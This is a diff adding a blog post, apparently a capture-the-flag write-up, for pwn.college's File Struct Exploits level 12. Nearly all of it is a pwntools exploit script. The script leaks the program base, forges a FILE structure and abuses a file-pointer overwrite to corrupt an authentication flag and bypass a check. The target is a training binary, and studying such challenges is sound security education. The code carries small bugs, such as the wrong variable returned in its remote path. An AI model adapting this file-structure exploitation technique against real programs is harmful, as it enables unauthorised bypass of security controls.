F9-DAMM

Author: hackeringtrue

_posts/2025-11-13-pwn-college-File-Struct-Exploits-level12.md

@@ -0,0 +1,104 @@
+---
+layout: post
+title: (File Struct Exploits) level 12
+categories: pwn.college File-Struct-Exploits
+date: 2025-11-13 09:02:27 +0300
+tags: pwn.college FSOP fp-overwrite
+---
+## Information
+- category: pwn
+
+
+## Description 
+> Apply FILE struct exploits to write data to bypass a security check.
+
+## Exploit
+
+```python
+#!/usr/bin/env python3
+
+from pwn import *
+
+exe = ELF("./babyfile_level12_patched")
+context.terminal = "kitty"
+context.binary = exe
+
+
+def conn():
+    if args.LOCAL:
+        global p
+        p = process([exe.path])
+        gdb.attach(p)
+    else:
+        r = remote("addr", 1337)
+    return p
+
+
+def new_note(idx, size):
+    p.sendlineafter(b"> ", b"new_note")
+    p.sendlineafter(b"> ", idx)
+    p.sendlineafter(b"> ", size)
+
+
+def del_note():
+    p.sendlineafter(b"> ", b"del_note")
+
+
+def write_note(idx, data):
+    p.sendlineafter(b"> ", b"write_note")
+    p.sendlineafter(b"> ", idx)
+    p.send(data)
+
+
+def read_note(idx, data):
+    p.sendlineafter(b"> ", b"read_note")
+    p.sendlineafter(b"> ", idx)
+    p.send(data)
+
+
+def open_file():
+    p.sendlineafter(b"> ", b"open_file")
+
+
+def read_file(idx):
+    p.sendlineafter(b"> ", b"read_file")
+    p.sendlineafter(b"> ", idx)
+
+
+def write_fp(data):
+    p.sendlineafter(b"> ", b"write_fp")
+    p.send(data)
+
+
+def authenticated():
+    p.sendlineafter(b"> ", b"authenticate")
+
+
+def quit():
+    p.sendlineafter(b"> ", b"quit")
+
+
+def main():
+    r = conn()
+
+    r.recvuntil(b"located at: ")
+    baself = int(r.recvline()[:-1], 16) - exe.sym["main"]
+    authenticate = baself + 0x5170
+
+    new_note(b"0", b"4")
+    write_note(b"0", b"AAA")
+    # read_note(b"0", b"AAA")
+    open_file()
+    fp = FileStructure()
+    fp = fp.read(authenticate, 10)
+    raw_input("DEBUG")
+    write_fp(bytes(fp))
+
+    read_file(b"0")
+
+    r.interactive()
+
+
+if __name__ == "__main__":
+    main()
+```